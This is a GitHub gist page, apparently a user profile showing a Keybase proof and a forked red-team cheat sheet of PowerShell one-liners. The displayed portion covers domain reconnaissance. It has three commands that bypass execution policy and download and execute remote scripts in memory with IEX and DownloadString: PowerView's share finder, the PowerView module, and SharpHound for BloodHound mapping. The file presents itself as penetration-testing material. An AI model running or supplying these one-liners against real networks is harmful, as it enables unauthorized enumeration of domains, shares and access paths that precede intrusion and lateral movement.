Skip to content

Instantly share code, notes, and snippets.

View sh4d3s's full-sized avatar
👋

Sourov Ghosh sh4d3s

👋
View GitHub Profile

Keybase proof

I hereby claim:

  • I am sh4d3s on github.
  • I am sh4d3s (https://keybase.io/sh4d3s) on keybase.
  • I have a public key whose fingerprint is 41AD 86E6 073A 4A5F D371 C714 65D8 E6BB 1C49 3B72

To claim this, I am signing this object:

@sh4d3s
sh4d3s / RedTeam_CheatSheet.ps1
Created November 9, 2019 12:14 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"